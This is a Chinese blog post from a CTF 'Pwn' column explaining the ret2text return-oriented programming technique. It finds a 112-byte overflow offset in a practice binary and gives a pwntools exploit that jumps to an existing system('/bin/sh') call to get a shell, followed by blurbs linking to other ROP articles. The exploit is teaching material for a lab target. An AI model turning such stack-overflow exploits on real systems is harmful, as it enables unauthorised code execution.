基本ROP(一)

最新推荐文章于 2024-05-29 17:57:18 发布
最新推荐文章于 2024-05-29 17:57:18 发布
阅读量1.7w 收藏 38
点赞数 6
分类专栏: Pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Pwnpanda/article/details/80210856
版权

每日一结【第1天】

友情链接:

CTF Wiki
二进制保护机制
栈溢出原理
一步一步学ROP之linux_x86篇
一步一步学ROP之linux_x64篇

ret2text

原理:
ret2text即需要我们控制程序执行程序本身已有的的代码(.text)。其实,这种攻击方法是一种笼统的描述。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码(也就是gadgets),这就是我们所要说的rop。

这时,我们需要知道对应返回的代码的位置。当然程序也可能会开启某些保护,我们需要想办法去绕过这些保护。

样例:ret2text

先运行一下程序,发现只是让输入一串字符串
这里写图片描述
file指令查看,发现是32位程序,gdb调试,查看保护机制
这里写图片描述

使用IDA Pro分析一波,发现这个地方是存在栈溢出漏洞的

这里写图片描述

然后我们又会发现secure函数里存在system(“/bin/sh”)
这里写图片描述

那我们的目标就是控制程序直接跳到0x0804863A处从而拿到shell,接下来就开始构造payload
个人比较喜欢使用pattern来确定偏移量
pattern create 150用来生成一段长150个字节的字符串
这里写图片描述
pattern offset $ebp用来确定输入的字符串第一个字节与ebp的距离,这里我们看到显示的是108,但是我们要覆盖掉ebp,这样才能覆盖ret地址,所以这段长度应该是112(也可以使用 pattern offset 0x41384141直接得到112,但是64位程序不能这样,具体原理我还不是很理解)
这里写图片描述

现在开始构造payload
payload = ‘A’ * 112 + p32(target_addr)

exp:

from pwn import *

r = process('./ret2text')

system_addr = 0x0804863A
payload = 'A'*112 + p32(system_addr)

r.recvuntil('There is something amazing here, do you know anything?')
r.sendline(payload)

r.interactive()

执行之后
这里写图片描述

就这样~~挺简单的一个程序,但是真正完全理解其中的道理还是需要一定时间的

友情链接:https://ctf-wiki.github.io/ctf-wiki/pwn/stackoverflow/basic_rop/

Pwnpanda
关注
  • 6
    点赞
  • 38
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Python程序设计-安全渗透测试-漏洞渗透模块
Xunuannuan的博客
04-26 877
测试软件的溢出漏洞 FreeFloat FTP Server会在运行的主机上建立一个FTP,其他计算机上的用户可以登录到这个FTP上来存取文件 例如,在主机192.168.0.116的C盘中运行这个FTP软件,在另外一台计算机中可以使用FTP下载工具或者命令的方式进行访问。这里采用命令的方式对其进行访问,(使用 FreeFloat FTP Server这个服务器对登录没有任何的限制,输入任意的用...
ROP基本原理和实战教学,看这一篇就够了
QL_2023的博客
02-21 2038
ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。通过上一篇文章栈溢出漏洞原理详解与利用,我们可以发现栈溢出的控制点是ret处,那么ROP的核心思想就是利用以ret结尾的指令序列把栈中的应该返回EIP的地址更改成我们需要的值,从而控制程序的执行流程。
计算机系统:Return Oriented Programming(ROP详解——颠覆传统的攻击方式
m0_72410588的博客
08-31 880
在计算机领域,随着技术的不断发展,攻击者也在探索新的方式来突破系统的安全防线。其中一种被广泛讨论的攻击方式就是"Return Oriented Programming"(ROP,返回导向编程)。本文将深入探讨ROP的原理、应用以及对计算机系统安全的影响。
栈溢出漏洞利用一,详解基本ROP,构造rop链条实现攻击(pwn入门)
最新发布
2402_83422357的博客
05-29 1058
基本ROP攻击手法的话其实还有一个最常用的,比赛经常出现的,也就是打syscall的ROP攻击链没有提到,下次有时间讲下打syscall的攻击手法,但是只有先把上面的两个ROP链的攻击手法会懂了,尤其是ret2shellcode,才能够有可能真正理解syscall的ROP攻击链,其实我自己对于ret2shellcode也仅仅是学了个入门而已,还有很多不懂的,还在学习ing.参考文章:CTF Wiki。
rop入门(二)
陈安志的博客
01-12 3108
一:  上一篇讲解了一下什么是rop以及如何搭建rop框架,本章节讲解,如何使用rop进行服务的调用以及参数的传递  同springMvc相似 rop也是通过在web.xml中配置拦截来声明该url链接启用rop框架。至于如何调用controller层内的方法,rop有专门的参数用来指定,这个下边会讲到。示例:  web.xml servlet> se
linux内核rop姿势详解,[原创]rop链攻击原理与思路(x86/x64)
weixin_42397925的博客
05-02 809
rop链的基础原理rop是Return Oriented Programming(面向返回的编程)的缩写;根据函数调用规则,当刚跳转到其它函数去执行时,从被调用者的视角看:栈顶是返回地址,紧接着是自己的参数(X86架构下);然后,被调用者会对栈空间进行一系列操作,保存寄存器和存储临时变量,但在即将退出时会清理自己消耗的栈空间,以使其回到自己被调用前的栈空间,保持栈平衡;最后,被调用者以ret指令结...
rop开放平台
04-12
用户下载后,可以研究源代码,学习如何实现一个基本ROP攻击或防御机制,从而加深对这一技术的理解。 总的来说,ROP开放平台是一个综合性的学习和研究平台,对于想深入理解和应对ROP攻击的安全专业人员来说,是一...
rop轻松谈.pdf
10-21
本文將對ROP技術進行詳細的介紹,涵蓋ROP基本概念、Buffer Overflow、ret2libc/ret2text、Return Oriented Programming等知识点。 ROP技术的基本概念 ROP技術是基於Buffer Overflow的攻擊技術,通過覆蓋函數返回...
rop demo完整用例
07-16
ROP基本思想是不注入新的代码,而是利用程序已经存在的指令序列(每个序列通常只包含一到两个指令,结束于`ret`指令),这些序列被称为gadgets。攻击者通过精心设计的堆栈布局,使得程序在执行到`ret`指令时,返回...
Rompmporium漏洞:ROP Emporium漏洞
02-15
ROP Emporium是一个在线平台,提供了一系列的挑战,旨在帮助安全研究人员和逆向工程师学习和实践ROP技术。 **什么是ROP(Return-Oriented Programming)?** ROP允许攻击者通过拼接一系列预先存在的、短小的指令...
rop-sample.rar_.comrop_rop_rop源码下载_taobao netty
09-20
通过深入研究这个rop-sample项目,开发者不仅能学习到ROP基本原理和利用技巧,还能了解到如何在实际项目中结合Netty实现安全的网络通信。这对于提升网络安全意识和掌握高级安全技术具有重要意义。 总的来说,这个...
深入探究64位rop链构造,wp中常见的万能gadgets详解| 攻防世界pwn进阶区welpwn
Kni9hT's Blog
03-20 1689
文章目录前言思路分析0x00.检查保护机制0x01.找到溢出点0x02.跳过echo在buf上构造rop0x03.选择合适的gadgets0x04.万能的通用gadgets利用过程使用DynELF使用LibcSearcher 前言 这一题做的时间跨度比较长了,断断续续做了一天多,然后尝试了两种方式,一种是DynELF泄露system地址,还有一种是利用python的LibcSearcher模块得到...
(原)ROP公式的说明
cqwmy840702的博客
03-26 2234
ROP=采购提前期*平均消耗+服务因子*标准偏差 以前对标准偏差的理解有误,没有考虑 采购提前期与样本周期不重合的因素。 如果 统计标准偏差的间隔期间为t,采购提前期为T 那么修正系数为 T/t ^1/2 ...
ROP实例分析(三)--------------------------实例分析
iDevil7的博客
07-13 1407
实例分析源程序如下IDA分析分析过程首先关注mian函数可以看到程序流程设置定时器打印输出Welcometo RCTF\n清空_bss_start数据流读取用户输入到buff(1024字节)中去调用echo函数,参数为buff然后看子函数echo,该子程序流程如下将用户输入的buff逐字节地拷贝到s2(16字节)中,如果遇到\x00截断于是我们找到了漏洞所在处我们要做的工作就是覆盖返回地址并且构造...
基本ROP
听鬼哥说故事
08-29 8631
随着NX保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是ROP(Return Oriented Programming),其主要思想是在**栈缓冲区溢出的基础上(这一条之后不再重复提及),通过利用程序中已有的小片段(gadgets)来改变某些寄存器或者变量的值,从而改变程序的执行流程。**所谓gadgets就是以ret结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。
rop学习(三)
陈安志的博客
01-12 1386
上一节讲解了rop如何进行参数的传递,以及返回。本章节讲解rop如何进行应用的授权访问以及验证  当用户需要访问某个应用系统前,应用系统一般都需要对该用户进行身份认证。常见的身份认证方法是让用户输入“用户/密码” ,当通过验证后,允许进入系统,否则阻止用户登录系统和应用系统类似,服务开放平台也需要对接入的应用进行身份认证,以确保服务只向合法授权的客户端应用开放。一般的做法是:服务开放平台通过一个
基本ROP技巧总结
极目楚天舒的博客
05-06 5635
ROP攻击前提:存在栈溢出并且可以控制返回地址存在满足条件的gadget,如果开启了PIE保护则要想办法泄露gadget的地址ret2text程序本身存在类似于system('/bin/sh')或者execv('/bin/sh')的片段,我们可以直接将返回地址覆盖为其地址跳转到已有代码上。例子:TODOret2shellcode这种方法要求我们自己构造shellcode并控制程序跳转到我们构造的s...
小白详解rop emporium
BadRer的博客
08-02 2090
小白详解rop emporium 前言 rop emporium网站上提供了许多构造rop的challenge,作为小白的我从这里开始,专注于rop链的构造。 ps:写完放了好久结果没投出去,我好菜啊-。- 题目 0x0 ret2win32 IDA打开,很容易找到溢出点 char s; // [esp+0h][ebp-28h]可以看出s距ebp的偏移为0x28 m...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值